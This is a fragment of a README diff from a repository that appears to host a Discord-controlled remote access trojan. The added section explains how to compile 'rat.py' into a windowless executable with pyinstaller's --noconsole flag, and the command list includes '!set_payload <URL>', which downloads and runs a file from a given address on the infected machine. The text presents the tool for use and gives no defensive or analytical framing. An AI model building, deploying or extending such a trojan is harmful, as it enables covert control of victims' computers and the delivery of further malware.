canstralian/ForkDATThang/README.md

 6. Invite the bot to your Discord server and start using the available commands.

+## Building the RAT

+To build the RAT executable (.exe) file, you can use pyinstaller.
+Follow these steps:

+Install pyinstaller by running pip install pyinstaller.
+Open a terminal or command prompt.
+Navigate to the project directory.
+Run the following command: pyinstaller --onefile --noconsole rat.py.
+After the build process completes, the executable file will be available in the dist directory.

 ## Available Commands

 - `!set_payload <URL>`: Download and execute a file from the provided URL.